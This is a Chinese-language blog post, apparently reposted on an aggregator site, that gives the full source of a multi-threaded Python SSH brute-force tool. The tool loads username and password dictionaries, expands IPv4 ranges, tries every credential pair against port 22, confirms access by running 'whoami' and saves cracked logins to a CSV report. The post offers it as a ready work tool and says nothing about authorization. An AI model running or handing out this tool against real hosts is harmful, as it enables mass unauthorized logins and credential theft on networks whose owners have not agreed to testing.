多線程sshd爆破程序代碼
很少說了,直接上手代碼,也沒有啥練手的,都是很熟悉的代碼,水一篇,方便做爲工做的小工具吧。試了一下,配合一個好點的字典,仍是能夠做爲我的小工具使用的。python
1 #!/usr/bin/env python 2 # -*- coding:utf-8 -*- 3 4 ''' 5 SSH服務弱口令掃描腳本 6 做者:陳然 7 ''' 8 9 #引入包文件 10 import ipaddr 11 import logging 12 import datetime 13 import paramiko 14 import threading 15 from optparse import OptionParser 16 17 #定義全局配置 18 logging.basicConfig(format="%(message)s",level=logging.INFO) 19 20 #定義全局變量 21 username_config_file = "../config/username.conf" 22 password_config_file = "../config/password.conf" 23 username_list = [] 24 password_list = [] 25 target_list = [] 26 result_list = [] 27 multi_thread = False 28 29 30 #定義全局接口函數 31 def read_config_from_file(): 32 """從配置文件夾下的字典文件中讀取爆破用戶名和口令""" 33 global username_list 34 global password_list 35 #讀取用戶名字典 36 with open(username_config_file,"r") as fr: 37 for line in fr.readlines(): 38 username = line.split("\n")[0].split("\r")[0] 39 username_list.append(username) 40 #讀取口令字典 41 with open(password_config_file,"r") as fr: 42 for line in fr.readlines(): 43 password = line.split("\n")[0].split("\r")[0] 44 password_list.append(password) 45 #字典列表去重 46 username_list = list(set(username_list)) 47 password_list = list(set(password_list)) 48 49 50 def change_config_files(username_file=None,password_file=None): 51 """指定用戶名和口令的字典配置文件""" 52 global username_config_file 53 global password_config_file 54 if username_file != None: 55 username_config_file = username_file 56 if password_file != None: 57 password_config_file = password_file 58 59 def target_analyst(target): 60 """對於目標網絡地址分析並拆分其中的地址段 僅支持IPv4""" 61 global target_list 62 target = ipaddr.IPv4Network(target) 63 hosts_list = target.iterhosts() 64 for host in hosts_list: 65 target_list.append(str(host)) 66 67 def target_file_anylast(filename): 68 """分析目標列表文件""" 69 file_to_target = [] 70 with open(filename,"r") as fr: 71 for line in fr.readlines(): 72 each_target = line.split("\n")[0].split("\r")[0] 73 file_to_target.append(each_target) 74 return file_to_target 75 76 77 def send_crack_packet(target,username,password,port=22,timeout=3): 78 """發送爆破登陸報文""" 79 global result_list 80 #局部變量 81 flag = False#是否有漏洞的標誌位,默認False 82 #建立SSH對象並登錄 83 logging.info("[+] 爆破對象 地址%s 端口:%s 用戶名:%s 口令:%s"%(str(target),str(port),str(username),str(password))) 84 ssh = paramiko.SSHClient() 85 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 86 try: 87 ssh.connect(hostname=target, port=port, username=username, password=password,timeout=timeout,allow_agent=False,look_for_keys = False) 88 #執行命令 89 stdin, stdout, stderr = ssh.exec_command('whoami',timeout=timeout) 90 #獲取命令結果 91 result = stdout.read().split("\n")[0] 92 if result == username: 93 flag = True 94 report_sting = "%s,%s,%s,%s,%s\n"%(str(target),"YES",str(port),str(username),str(password)) 95 result_list.append(report_sting) 96 logging.info("[*] 爆破成功: 詳細信息[地址:%s,端口:%s,用戶名:%s,口令:%s]"%(str(target),str(port),str(username),str(password))) 97 try: 98 if multi_thread == False: 99 continue_flag = raw_input("是否繼續?[1]繼續[2]退出") 100 continue_flag = int(continue_flag) 101 else: 102 continue_flag = 1 103 except Exception,ex: 104 continue_flag = 2 105 if continue_flag != 1: 106 exit(0) 107 except Exception,ex: 108 pass 109 #關閉鏈接 110 ssh.close() 111 return flag 112 113 114 def create_report(): 115 """生成報告文件""" 116 time_string = str(datetime.datetime.now()).replace(" ","").replace(":","") 117 fd = open("../result/%s.csv"%time_string,"w") 118 fd.write("Target-IP,WEAK,PORT,USERNAME,PASSWORD\n") 119 for result_string in result_list: 120 fd.write(result_string) 121 fd.close() 122 123 124 def parameter_checker(parameter): 125 """參數檢查函數""" 126 if parameter in ["",None," ","null"]: 127 return False 128 else: 129 return True 130 131 132 def list_devide(object_list,count): 133 """列表拆分函數""" 134 return_list = [] 135 if not isinstance(object_list,list): 136 return [] 137 else: 138 total = len(object_list) 139 size = total/count + 1 140 start = 0 141 end = start + size 142 while True: 143 if end <= total: 144 return_list.append(object_list[start:end]) 145 elif end > total and start < total: 146 return_list.append(object_list[start:]) 147 elif start > total: 148 break 149 else: 150 break 151 start += size 152 end += size 153 return return_list 154 155 class cracker(threading.Thread): 156 """多線程爆破類""" 157 def __init__(self,target_list,timeout): 158 """多線程爆破構造函數""" 159 threading.Thread.__init__(self) 160 self.__target_list = target_list 161 self.__timeout = timeout 162 163 def run(self): 164 for target in self.__target_list: 165 for username in username_list: 166 for password in password_list: 167 send_crack_packet(target=target,username=username,password=password,timeout=self.__timeout) 168 169 170 if __name__ == '__main__': 171 parser = OptionParser() 172 parser.add_option("-a","--target",dest="target",help="Target IP Addresses!") 173 parser.add_option("-i","--infile",dest="infile",help="Target IP Addresses File!") 174 parser.add_option("-u","--user",dest="userfile",help="Username Dictionary File!") 175 parser.add_option("-p","--pswd",dest="pswdfile",help="Password Dictionary File!") 176 parser.add_option("-o","--outfile",dest="outfile",help="Create A Report File! If [Yes] Create Report!") 177 parser.add_option("-n","--thread",dest="threadnum",help="Count Of Thread!") 178 parser.add_option("-t","--timeout",dest="timeout",help="Timeout Of Seconds!") 179 (options, arges) = parser.parse_args() 180 try: 181 options.threadnum = int(options.threadnum) 182 except Exception,ex: 183 options.threadnum = 1 184 options.threadnum = 10 if options.threadnum > 10 else options.threadnum 185 try: 186 timeout = int(options.timeout) 187 except Exception,ex: 188 timeout = 3 189 timeout = 60 if timeout >= 60 else timeout 190 if (parameter_checker(options.target) or parameter_checker(options.infile)) == False: 191 logging.error("[-] 輸入參數錯誤!!!") 192 exit(0) 193 logging.info("[+] 目標初始化...") 194 if options.infile != None: 195 ret = target_file_anylast(options.infile) 196 for item in ret: 197 if item.find("/") >= 0 or item.find("-") >= 0: 198 target_analyst(item) 199 else: 200 target_list.append(item) 201 if options.target != None: 202 if options.target.find("/") >= 0 or options.target.find("-") >= 0: 203 target_analyst(options.target) 204 else: 205 target_list.append(options.target) 206 logging.info("[+] 目標初始化完成!!!") 207 if (parameter_checker(options.userfile) or parameter_checker(options.pswdfile)) == True: 208 logging.info("[+] 配置字典文件!!!") 209 change_config_files(username_file=options.userfile,password_file=options.pswdfile) 210 read_config_from_file() 211 logging.info("[+] 開始掃描") 212 #單線程爆破 213 if options.threadnum == 1: 214 for target in target_list: 215 for username in username_list: 216 for password in password_list: 217 send_crack_packet(target=target,username=username,password=password,timeout=timeout) 218 #多線程爆破 219 else: 220 multi_thread = True 221 thread_list = [] 222 thread_target_list = list_devide(target_list,options.threadnum) 223 for thread_target in thread_target_list: 224 thread_object = cracker(thread_target,timeout) 225 thread_list.append(thread_object) 226 for thread in thread_list: 227 thread.start() 228 for thread in thread_list: 229 thread.join() 230 if parameter_checker(options.outfile) and options.outfile == "yes": 231 logging.info("[+] 生成報告中...") 232 create_report() 233 logging.info("[+] 報告已生成!!!") 234 logging.info("[+] 掃描完成")
相關文章
- 1. python——ssh多線程爆破腳本
- 2. 多進程多線程測試代碼
- 3. 多線程代碼windows
- 4. Java多線程代碼
- 5. 多線程窮舉法破解密碼
- 6. HYDRA遠程爆破
- 7. mysql3306多線程爆破工具修復版
- 8. safe6出品java版3306多線程爆破工具
- 9. 2. OD-爆破exe驗證程序
- 10. 線程、代碼和數據——多線程Java程序的實際運行方式
- 更多相關文章...
- • C# 多線程 - C#教程
- • W3C 程序 - W3C 教程
- • Java 8 Stream 教程
- • YAML 入門教程
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. python——ssh多線程爆破腳本
- 2. 多進程多線程測試代碼
- 3. 多線程代碼windows
- 4. Java多線程代碼
- 5. 多線程窮舉法破解密碼
- 6. HYDRA遠程爆破
- 7. mysql3306多線程爆破工具修復版
- 8. safe6出品java版3306多線程爆破工具
- 9. 2. OD-爆破exe驗證程序
- 10. 線程、代碼和數據——多線程Java程序的實際運行方式